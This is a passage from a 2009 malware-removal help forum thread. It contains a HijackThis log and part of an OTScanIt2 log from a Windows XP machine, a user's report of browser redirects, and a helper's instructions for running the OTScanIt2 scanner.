C:\Program Files\Java\jre6\bin\jqs.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: McAfee Phishing Filter - {27B4851A-3207-45A2-B947-BE8AFE6163AB} - c:\PROGRA~1\mcafee\msk\mskapbho.dll
O2 - BHO: scriptproxy - {7DB2D5A0-7241-4E79-B68D-6309F01C5231} - C:\Program Files\McAfee\VirusScan\scriptsn.dll
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\5.0.926.3450\swg.dll
O2 - BHO: McAfee SiteAdvisor BHO - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Program Files\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: McAfee SiteAdvisor Toolbar - {0EBBBE48-BAD4-4B4C-8E5A-516ABECAE064} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O4 - HKLM\..\Run: [mcagent_exe] "C:\Program Files\McAfee.com\Agent\mcagent.exe" /runkey
O4 - HKLM\..\Run: [LogMeIn GUI] "C:\Program Files\LogMeIn\x86\LogMeInSystray.exe"
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [nForce Tray Options] sstray.exe /r
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [UserFaultCheck] %systemroot%\system32\dumprep 0 -u
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\RunOnce: [Malwarebytes' Anti-Malware] C:\Program Files\Malwarebytes' Anti-Malware\mbamgui.exe /install /silent
O4 - HKCU\..\Run: [googletalk] C:\Program Files\Google\Google Talk\googletalk.exe /autostart
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [Google Update] "C:\Documents and Settings\David\Local Settings\Application Data\Google\Update\GoogleUpdate.exe" /c
O4 - HKUS\S-1-5-21-1275210071-796845957-839522115-1010\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet (User 'Mrs. Richards')
O4 - HKUS\S-1-5-21-1275210071-796845957-839522115-1010\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe (User 'Mrs. Richards')
O4 - HKUS\S-1-5-21-1275210071-796845957-839522115-1010\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe (User 'Mrs. Richards')
O4 - HKUS\S-1-5-21-1275210071-796845957-839522115-1010\..\Run: [Elo Touch Systems] C:\Program Files\EloTouchSystems\EloTTray.exe (User 'Mrs. Richards')
O4 - HKUS\S-1-5-21-1275210071-796845957-839522115-1010\..\Run: [Google Update] "C:\Documents and Settings\Mrs. Richards\Local Settings\Application Data\Google\Update\GoogleUpdate.exe" /c (User 'Mrs. Richards')
O4 - HKUS\S-1-5-21-1275210071-796845957-839522115-1010\..\Run: [AdobeUpdater] "C:\Program Files\Common Files\Adobe\Updater5\AdobeUpdater.exe" (User 'Mrs. Richards')
O4 - HKUS\S-1-5-21-1275210071-796845957-839522115-1010\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background (User 'Mrs. Richards')
O4 - HKUS\S-1-5-18\..\RunOnce: [RunNarrator] Narrator.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [RunNarrator] Narrator.exe (User 'Default user')
O4 - S-1-5-21-1275210071-796845957-839522115-1010 Startup: OneNote 2007 Screen Clipper and Launcher.lnk = C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (User 'Mrs. Richards')
O4 - S-1-5-21-1275210071-796845957-839522115-1010 User Startup: OneNote 2007 Screen Clipper and Launcher.lnk = C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (User 'Mrs. Richards')
O4 - Startup: ERUNT AutoBackup.lnk = C:\Program Files\ERUNT\AUTOBACK.EXE
O4 - Startup: OneNote 2007 Screen Clipper and Launcher.lnk = C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
O4 - Startup: OpenOffice.org 2.4.lnk = C:\Program Files\OpenOffice.org 2.4\program\quickstart.exe
O4 - Global Startup: Acrobat Assistant.lnk.disabled
O4 - Global Startup: Adobe Gamma Loader.exe.lnk.disabled
O4 - Global Startup: Adobe Gamma Loader.lnk.disabled
O4 - Global Startup: Adobe Reader Speed Launch.lnk.disabled
O4 - Global Startup: Device Detector 2.lnk.disabled
O4 - Global Startup: Device Detector 3.lnk = C:\Program Files\Olympus\DeviceDetector\DevDtct2.exe
O4 - Global Startup: HP Digital Imaging Monitor.lnk.disabled
O4 - Global Startup: Microsoft Office.lnk.disabled
O4 - Global Startup: Microsoft Works Calendar Reminders.lnk.disabled
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Share in Hello - {B13B4423-2647-4cfc-A4B3-C7D56CB83487} - C:\Program Files\Hello\PicasaCapture.dll
O9 - Extra 'Tools' menuitem: Share in H&ello - {B13B4423-2647-4cfc-A4B3-C7D56CB83487} - C:\Program Files\Hello\PicasaCapture.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O12 - Plugin for .spop: C:\Program Files\Internet Explorer\Plugins\NPDocBox.dll
O16 - DPF: {474F00F5-3853-492C-AC3A-476512BBC336} (UploadListView Class) - http://picasaweb.google.com/s/v/19.13/uploader2.cab
O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) - http://download.mcafee.com/molbin/shared/mcinsctl/en-us/4,0,0,83/mcinsctl.cab
O16 - DPF: {664088B0-6AF3-4514-AF9D-A0DC3A3DF24A} (F-Secure Online Scanner 3.3) - http://support.f-secure.com/ols3beta/fscax.cab
O16 - DPF: {B9191F79-5613-4C76-AA2A-398534BB8999} (YAddBook Class) - http://us.dl1.yimg.com/download.yahoo.com/dl/installs/suite/yautocomplete.cab
O16 - DPF: {BCC0FF27-31D9-4614-A68E-C18E1ADA4389} (DwnldGroupMgr Class) - http://download.mcafee.com/molbin/shared/mcgdmgr/1,0,0,26/mcgdmgr.cab
O16 - DPF: {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} (Performance Viewer Activex Control) - https://secure.logmein.com/activex/ractrl.cab?lmi=100
O18 - Protocol: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\PROGRA~1\mcafee\SITEAD~1\mcieplg.dll
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O23 - Service: McAfee Application Installer Cleanup (0145771234431512) (0145771234431512mcinstcleanup) - Unknown owner - C:\WINDOWS\TEMP\014577~1.EXE (file missing)
O23 - Service: Avira AntiVir Personal - Free Antivirus Scheduler (AntiVirScheduler) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: Avira AntiVir Personal - Free Antivirus Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: Canon Camera Access Library 8 (CCALib8) - Canon Inc. - C:\Program Files\Canon\CAL\CALMAIN.exe
O23 - Service: EloSystemService - Elo Touchsystems, Inc. - C:\WINDOWS\system32\EloSrvce.exe
O23 - Service: Google Desktop Manager 5.8.811.4345 (GoogleDesktopManager-110408-113106) - Google - C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
O23 - Service: Google Update Service (gupdate1c98bee6cb9fb98) (gupdate1c98bee6cb9fb98) - Google Inc. - C:\Program Files\Google\Update\GoogleUpdate.exe
O23 - Service: Google Software Updater (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: InCD Helper (read only) (InCDsrvR) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Program Files\Java\jre6\bin\jqs.exe
O23 - Service: LexBce Server (LexBceS) - Lexmark International, Inc. - C:\WINDOWS\system32\LEXBCES.EXE
O23 - Service: LogMeIn Maintenance Service (LMIMaint) - LogMeIn, Inc. - C:\Program Files\LogMeIn\x86\RaMaint.exe
O23 - Service: LogMeIn - LogMeIn, Inc. - C:\Program Files\LogMeIn\x86\LogMeIn.exe
O23 - Service: MBackMonitor - McAfee - C:\Program Files\McAfee\MBK\MBackMonitor.exe
O23 - Service: McAfee SiteAdvisor Service - Unknown owner - C:\Program Files\McAfee\SiteAdvisor\McSACore.exe
O23 - Service: McAfee Services (mcmscsvc) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
O23 - Service: McAfee Network Agent (McNASvc) - McAfee, Inc. - c:\program files\common files\mcafee\mna\mcnasvc.exe
O23 - Service: McAfee Scanner (McODS) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
O23 - Service: McAfee Proxy Service (McProxy) - McAfee, Inc. - c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
O23 - Service: McAfee Real-time Scanner (McShield) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
O23 - Service: McAfee SystemGuards (McSysmon) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
O23 - Service: McAfee Personal Firewall Service (MpfService) - McAfee, Inc. - C:\Program Files\McAfee\MPF\MPFSrv.exe
O23 - Service: McAfee SpamKiller Service (MSK80Service) - McAfee, Inc. - C:\Program Files\McAfee\MSK\MskSrver.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: PCTEL Speaker Phone (Pctspk) - PCtel, Inc. - C:\WINDOWS\system32\pctspk.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: SecuROM User Access Service (V7) (UserAccess7) - Unknown owner - C:\WINDOWS\system32\UAService7.exe
--
End of file - 13761 bytes
drrchrds
2009-02-13, 06:15
I am still having a lot of browser redirects. I tried to search for the tracking cookie found in the above scan Revsci, and the browser redirects to things like Yahoo HotJobs, 404 Page not found, and phony virus software sites (at least I suspect they are phony). Still having trouble.
Hi drrchrds
Have a look at this tutorial about Firefox and cookies Firefox's Cookie Options (http://mozilla.gunnars.net/firefox_help_firefox_cookie_tutorial.html)
Please download OTScanIt2 from Geeks to Go (http://oldtimer.geekstogo.com/OTScanIt2.exe) or Bleeping Computer (http://download.bleepingcomputer.com/oldtimer/OTScanIt2.exe). Save it to your desktop.
Double click on OTScanIt2.exe to run it.
Click on Extract. Once done, you will be prompted. Click OK and click Close.
Double click on the OTScanIt2 folder. Double click on OTScanIt2.exe to run it.
Under Rookit Search, select Yes.
Click on Run Scan at the top left hand corner.
When done, Notepad will open. Please post this log in your next reply.
Thanks peku006
drrchrds
2009-02-13, 16:24
A couple steps back, I ran the F-Secure scan and it didi find something, but I did not remove it. Last night i was curious to see if Avira would find it, and it did. I assume they found the same thing, F-scan called it TrackingCookie.Revsci and Avira called it HTML.Rce.Gen.
Should I have Avira quarantine it?
Also, I have been using McAfee for a long time but I wonder if I would be just as well off with AVG or Avira or something else. What do you recommend?
Lastly, I have used spybot for years, but do you recommend that I add an additional malware program to the mix? like Malwarebytes or something else?
OTScan (i am breaking this into two posts becuase the scan is larger than the alloted 64000 characters):
[code]
OTScanIt2 logfile created on: 2/13/2009 8:16:53 AM - Run 1
OTScanIt2 by OldTimer - Version 1.0.7.1 Folder = C:\Documents and Settings\David\Desktop\OTScanIt2
Windows XP Home Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.11)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
2.00 Gb Total Physical Memory | 0.97 Gb Available Physical Memory | 48.69% Memory free
2.60 Gb Paging File | 1.61 Gb Available in Paging File | 61.95% Paging File free
Paging file location(s): C:\pagefile.sys 768 1536;
%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 74.52 Gb Total Space | 12.80 Gb Free Space | 17.18% Space Free | Partition Type: NTFS
D: Drive not present or media not loaded
Drive E: | 74.53 Gb Total Space | 38.34 Gb Free Space | 51.44% Space Free | Partition Type: NTFS
F: Drive not present or media not loaded
G: Drive not present or media not loaded
Drive H: | 232.88 Gb Total Space | 42.34 Gb Free Space | 18.18% Space Free | Partition Type: NTFS
I: Drive not present or media not loaded
Computer Name: CRUNCHER1
Current User Name: David
Logged in as Administrator.
Current Boot Mode: Normal
Scan Mode: Current user
Whitelist: On
File Age = 30 Days
[Processes - Safe List]
avcenter.exe -> %ProgramFiles%\Avira\AntiVir PersonalEdition Classic\avcenter.exe -> [2008/06/26 09:55:59 | 00,356,609 | ---- | M] (Avira GmbH)
avgnt.exe -> %ProgramFiles%\Avira\AntiVir PersonalEdition Classic\avgnt.exe -> [2008/06/12 13:28:45 | 00,266,497 | ---- | M] (Avira GmbH)
avgnt.exe -> %ProgramFiles%\Avira\AntiVir PersonalEdition Classic\avgnt.exe -> [2008/06/12 13:28:45 | 00,266,497 | ---- | M] (Avira GmbH)
avguard.exe -> %ProgramFiles%\Avira\AntiVir PersonalEdition Classic\avguard.exe -> [2008/10/15 13:30:02 | 00,151,297 | ---- | M] (Avira GmbH)
avscan.exe -> %ProgramFiles%\Avira\AntiVir PersonalEdition Classic\avscan.exe -> [2008/11/18 09:21:26 | 00,315,649 | ---- | M] (Avira GmbH)
calmain.exe -> %ProgramFiles%\Canon\CAL\CALMAIN.exe -> [2007/01/31 13:55:42 | 00,096,370 | ---- | M] (Canon Inc.)
devdtct2.exe -> %ProgramFiles%\Olympus\DeviceDetector\DevDtct2.exe -> [2007/02/22 17:32:12 | 00,118,784 | ---- | M] (OLYMPUS IMAGING CORP.)
devdtct2.exe -> %ProgramFiles%\Olympus\DeviceDetector\DevDtct2.exe -> [2007/02/22 17:32:12 | 00,118,784 | ---- | M] (OLYMPUS IMAGING CORP.)
elodkmon.exe -> %SystemRoot%\system32\EloDkMon.exe -> [2003/07/17 12:27:18 | 00,090,112 | ---- | M] (Elo Touchsystems, Inc.)
elodkmon.exe -> %SystemRoot%\system32\EloDkMon.exe -> [2003/07/17 12:27:18 | 00,090,112 | ---- | M] (Elo Touchsystems, Inc.)
elosrvce.exe -> %SystemRoot%\system32\EloSrvce.exe -> [2003/07/17 12:27:22 | 00,045,056 | ---- | M] (Elo Touchsystems, Inc.)
elottray.exe -> %SystemRoot%\system32\EloTTray.exe -> [2003/07/17 12:27:22 | 00,094,208 | ---- | M] (Elo Touchsystems, Inc.)
elottray.exe -> %SystemRoot%\system32\EloTTray.exe -> [2003/07/17 12:27:22 | 00,094,208 | ---- | M] (Elo Touchsystems, Inc.)
firefox.exe -> %ProgramFiles%\Mozilla Firefox\firefox.exe -> [2009/02/04 11:05:55 | 00,307,704 | ---- | M] (Mozilla Corporation)
googledesktop.exe -> %ProgramFiles%\Google\Google Desktop Search\GoogleDesktop.exe -> [2009/02/10 21:43:15 | 00,030,192 | ---- | M] (Google)
googledesktop.exe -> %ProgramFiles%\Google\Google Desktop Search\GoogleDesktop.exe -> [2009/02/10 21:43:15 | 00,030,192 | ---- | M] (Google)
googletalk.exe -> %ProgramFiles%\Google\Google Talk\googletalk.exe -> [2007/01/01 16:22:02 | 03,739,648 | ---- | M] (Google)
googleupdate.exe -> %ProgramFiles%\Google\Update\GoogleUpdate.exe -> [2009/02/10 21:28:10 | 00,133,104 | ---- | M] (Google Inc.)
googleupdate.exe -> %SystemDrive%\Documents and Settings\Mrs. Richards\Local Settings\Application Data\Google\Update\GoogleUpdate.exe -> [2008/11/12 18:37:50 | 00,133,104 | ---- | M] (Google Inc.)
googleupdate.exe -> %UserProfile%\Local Settings\Application Data\Google\Update\GoogleUpdate.exe -> [2008/09/02 23:12:43 | 00,133,104 | ---- | M] (Google Inc.)
incdsrv.exe -> %ProgramFiles%\Ahead\InCD\InCDsrv.exe -> [2005/01/27 19:16:58 | 00,856,064 | ---- | M] (Nero AG)
jqs.exe -> %ProgramFiles%\Java\jre6\bin\jqs.exe -> [2009/02/12 11:20:10 | 00,152,984 | ---- | M] (Sun Microsystems, Inc.)
lexbces.exe -> %SystemRoot%\system32\LEXBCES.EXE -> [2001/10/12 07:42:48 | 00,311,296 | ---- | M] (Lexmark International, Inc.)
lmiguardian.exe -> %ProgramFiles%\LogMeIn\x86\LMIGuardian.exe -> [2008/10/17 14:07:07 | 00,087,360 | ---- | M] (LogMeIn, Inc.)
lmiguardian.exe -> %ProgramFiles%\LogMeIn\x86\LMIGuardian.exe -> [2008/10/17 14:07:07 | 00,087,360 | ---- | M] (LogMeIn, Inc.)
lmiguardian.exe -> %ProgramFiles%\LogMeIn\x86\LMIGuardian.exe -> [2008/10/17 14:07:07 | 00,087,360 | ---- | M] (LogMeIn, Inc.)
logmein.exe -> %ProgramFiles%\LogMeIn\x86\LogMeIn.exe -> [2007/08/03 15:09:34 | 00,063,040 | ---- | M] (LogMeIn, Inc.)
logmeinsystray.exe -> %ProgramFiles%\LogMeIn\x86\LogMeInSystray.exe -> [2007/08/03 15:09:34 | 00,063,048 | ---- | M] (LogMeIn, Inc.)
logmeinsystray.exe -> %ProgramFiles%\LogMeIn\x86\LogMeInSystray.exe -> [2007/08/03 15:09:34 | 00,063,048 | ---- | M] (LogMeIn, Inc.)
mcagent.exe -> %ProgramFiles%\McAfee.com\Agent\mcagent.exe -> [2008/07/11 17:48:54 | 00,641,208 | ---- | M] (McAfee, Inc.)
mcagent.exe -> %ProgramFiles%\McAfee.com\Agent\mcagent.exe -> [2008/07/11 17:48:54 | 00,641,208 | ---- | M] (McAfee, Inc.)
mcmscsvc.exe -> %ProgramFiles%\McAfee\MSC\mcmscsvc.exe -> [2009/01/08 20:30:26 | 00,797,864 | ---- | M] (McAfee, Inc.)
mcnasvc.exe -> %CommonProgramFiles%\McAfee\MNA\McNASvc.exe -> [2008/07/18 07:02:52 | 02,482,848 | ---- | M] (McAfee, Inc.)
mcproxy.exe -> %CommonProgramFiles%\McAfee\McProxy\McProxy.exe -> [2008/07/09 13:49:10 | 00,358,736 | ---- | M] (McAfee, Inc.)
mcsacore.exe -> %ProgramFiles%\McAfee\SiteAdvisor\McSACore.exe -> [2008/12/05 15:51:06 | 00,206,096 | ---- | M] ()
mcshield.exe -> %ProgramFiles%\McAfee\VirusScan\Mcshield.exe -> [2008/06/20 04:41:04 | 00,144,704 | ---- | M] (McAfee, Inc.)
mcupdmgr.exe -> %ProgramFiles%\McAfee\MSC\mcupdmgr.exe -> [2008/06/14 09:41:54 | 00,781,288 | ---- | M] (McAfee, Inc.)
mcupdui.exe -> %ProgramFiles%\McAfee\MSC\mcupdui.exe -> [2008/06/21 11:39:02 | 00,377,064 | ---- | M] (McAfee, Inc.)
mpfsrv.exe -> %ProgramFiles%\McAfee\MPF\MpfSrv.exe -> [2008/07/09 16:36:30 | 00,884,360 | ---- | M] (McAfee, Inc.)
mscams32.exe -> %ProgramFiles%\Microsoft LifeCam\MSCamS32.exe -> [2008/04/25 12:00:26 | 00,156,704 | ---- | M] (Microsoft Corporation)
msksrver.exe -> %ProgramFiles%\McAfee\MSK\msksrver.exe -> [2008/07/09 13:35:34 | 00,025,416 | ---- | M] (McAfee, Inc.)
msmsgs.exe -> %ProgramFiles%\Messenger\msmsgs.exe -> [2008/04/13 19:12:28 | 01,695,232 | ---- | M] (Microsoft Corporation)
nvsvc32.exe -> %SystemRoot%\system32\nvsvc32.exe -> [2008/05/02 21:46:00 | 00,159,812 | ---- | M] (NVIDIA Corporation)
onenotem.exe -> %ProgramFiles%\Microsoft Office\Office12\ONENOTEM.EXE -> [2007/12/07 19:44:36 | 00,101,440 | ---- | M] (Microsoft Corporation)
otscanit2.exe -> %UserProfile%\Desktop\OTScanIt2\OTScanIt2.exe -> [2009/01/26 12:13:22 | 00,485,376 | ---- | M] (OldTimer Tools)
pctspk.exe -> %SystemRoot%\system32\pctspk.exe -> [2001/08/17 21:36:54 | 00,086,016 | ---- | M] (PCtel, Inc.)
ramaint.exe -> %ProgramFiles%\LogMeIn\x86\ramaint.exe -> [2008/10/17 14:07:39 | 00,116,032 | ---- | M] (LogMeIn, Inc.)
rundll32.exe -> %SystemRoot%\system32\rundll32.exe -> [2008/04/13 19:12:33 | 00,033,280 | ---- | M] (Microsoft Corporation)
rundll32.exe -> %SystemRoot%\system32\rundll32.exe -> [2008/04/13 19:12:33 | 00,033,280 | ---- | M] (Microsoft Corporation)
rundll32.exe -> %SystemRoot%\system32\rundll32.exe -> [2008/04/13 19:12:33 | 00,033,280 | ---- | M] (Microsoft Corporation)
rundll32.exe -> %SystemRoot%\system32\rundll32.exe -> [2008/04/13 19:12:33 | 00,033,280 | ---- | M] (Microsoft Corporation)
rundll32.exe -> %SystemRoot%\system32\rundll32.exe -> [2008/04/13 19:12:33 | 00,033,280 | ---- | M] (Microsoft Corporation)
rundll32.exe -> %SystemRoot%\system32\rundll32.exe -> [2008/04/13 19:12:33 | 00,033,280 | ---- | M] (Microsoft Corporation)
sched.exe -> %ProgramFiles%\Avira\AntiVir PersonalEdition Classic\sched.exe -> [2008/10/15 13:31:53 | 00,068,865 | ---- | M] (Avira GmbH)
soffice.bin -> %ProgramFiles%\OpenOffice.org 2.4\program\soffice.bin -> [2008/05/29 21:43:38 | 02,580,480 | ---- | M] (OpenOffice.org)
soffice.exe -> %ProgramFiles%\OpenOffice.org 2.4\program\soffice.exe -> [2008/05/29 21:43:36 | 02,363,392 | ---- | M] (OpenOffice.org)
sstray.exe -> %SystemRoot%\system32\sstray.exe -> [2003/10/23 08:13:08 | 00,073,728 | R--- | M] (NVIDIA Corporation)
teatimer.exe -> %ProgramFiles%\Spybot - Search & Destroy\TeaTimer.exe -> [2008/09/16 11:16:08 | 01,833,296 | ---- | M] (Safer Networking Limited)
uaservice7.exe -> %SystemRoot%\system32\UAService7.exe -> [2007/03/04 19:07:22 | 00,126,976 | ---- | M] ()
winword.exe -> %ProgramFiles%\Microsoft Office\Office10\WINWORD.EXE -> [2001/02/28 09:02:04 | 10,571,776 | R--- | M] (Microsoft Corporation)
ymsgr_tray.exe -> %ProgramFiles%\Yahoo!\Messenger\Ymsgr_tray.exe -> [2007/01/19 12:49:30 | 00,103,928 | ---- | M] (Yahoo! Inc.)
[Win32 Services - Safe List]
(AntiVirScheduler) Avira AntiVir Personal - Free Antivirus Scheduler [Win32_Own | Auto | Running] -> %ProgramFiles%\Avira\AntiVir PersonalEdition Classic\sched.exe -> [2008/10/15 13:31:53 | 00,068,865 | ---- | M] (Avira GmbH)
(AntiVirService) Avira AntiVir Personal - Free Antivirus Guard [Win32_Own | Auto | Running] -> %ProgramFiles%\Avira\AntiVir PersonalEdition Classic\avguard.exe -> [2008/10/15 13:30:02 | 00,151,297 | ---- | M] (Avira GmbH)
(aspnet_state) ASP.NET State Service [Win32_Own | On_Demand | Stopped] -> %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe -> [2007/10/24 00:47:22 | 00,033,800 | ---- | M] (Microsoft Corporation)
(CCALib8) Canon Camera Access Library 8 [Win32_Own | Auto | Running] -> %ProgramFiles%\Canon\CAL\CALMAIN.exe -> [2007/01/31 13:55:42 | 00,096,370 | ---- | M] (Canon Inc.)
(clr_optimization_v2.0.50727_32) .NET Runtime Optimization Service v2.0.50727_X86 [Win32_Own | On_Demand | Stopped] -> %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -> [2007/10/24 00:47:40 | 00,070,144 | ---- | M] (Microsoft Corporation)
(EloSystemService) EloSystemService [Win32_Own | Auto | Running] -> %SystemRoot%\system32\EloSrvce.exe -> [2003/07/17 12:27:22 | 00,045,056 | ---- | M] (Elo Touchsystems, Inc.)
(FontCache3.0.0.0) Windows Presentation Foundation Font Cache 3.0.0.0 [Win32_Own | On_Demand | Stopped] -> %SystemRoot%\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe -> [2006/10/20 20:21:24 | 00,036,864 | ---- | M] (Microsoft Corporation)
(GoogleDesktopManager-110408-113106) Google Desktop Manager 5.8.811.4345 [Win32_Own | On_Demand | Stopped] -> %ProgramFiles%\Google\Google Desktop Search\GoogleDesktop.exe -> [2009/02/10 21:43:15 | 00,030,192 | ---- | M] (Google)
(gupdate1c98bee6cb9fb98) Google Update Service (gupdate1c98bee6cb9fb98) [Win32_Own | Auto | Stopped] -> %ProgramFiles%\Google\Update\GoogleUpdate.exe -> [2009/02/10 21:28:10 | 00,133,104 | ---- | M] (Google Inc.)
(gusvc) Google Software Updater [Win32_Own | Auto | Stopped] -> %ProgramFiles%\Google\Common\Google Updater\GoogleUpdaterService.exe -> [2009/02/08 10:56:30 | 00,182,768 | ---- | M] (Google)
(helpsvc) Help and Support [Win32_Shared | Auto | Running] -> %SystemRoot%\PCHealth\HelpCtr\Binaries\pchsvc.dll -> [2008/04/13 19:12:02 | 00,038,400 | ---- | M] (Microsoft Corporation)
(IDriverT) InstallDriver Table Manager [Win32_Own | On_Demand | Stopped] -> %CommonProgramFiles%\InstallShield\Driver\1050\Intel 32\IDriverT.exe -> [2004/10/22 03:24:18 | 00,073,728 | ---- | M] (Macrovision Corporation)
(idsvc) Windows CardSpace [Win32_Shared | Unknown | Stopped] -> %SystemRoot%\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe -> [2006/10/30 02:33:58 | 00,741,376 | ---- | M] (Microsoft Corporation)
(InCDsrv) InCD Helper [Win32_Own | Auto | Running] -> %ProgramFiles%\Ahead\InCD\InCDsrv.exe -> [2005/01/27 19:16:58 | 00,856,064 | ---- | M] (Nero AG)
(InCDsrvR) InCD Helper (read only) [Win32_Own | Auto | Stopped] -> %ProgramFiles%\Ahead\InCD\InCDsrv.exe -> [2005/01/27 19:16:58 | 00,856,064 | ---- | M] (Nero AG)
(LexBceS) LexBce Server [Win32_Own | Auto | Running] -> %SystemRoot%\system32\LEXBCES.EXE -> [2001/10/12 07:42:48 | 00,311,296 | ---- | M] (Lexmark International, Inc.)
(LMIMaint) LogMeIn Maintenance Service [Win32_Own | Auto | Running] -> %ProgramFiles%\LogMeIn\x86\ramaint.exe -> [2008/10/17 14:07:39 | 00,116,032 | ---- | M] (LogMeIn, Inc.)
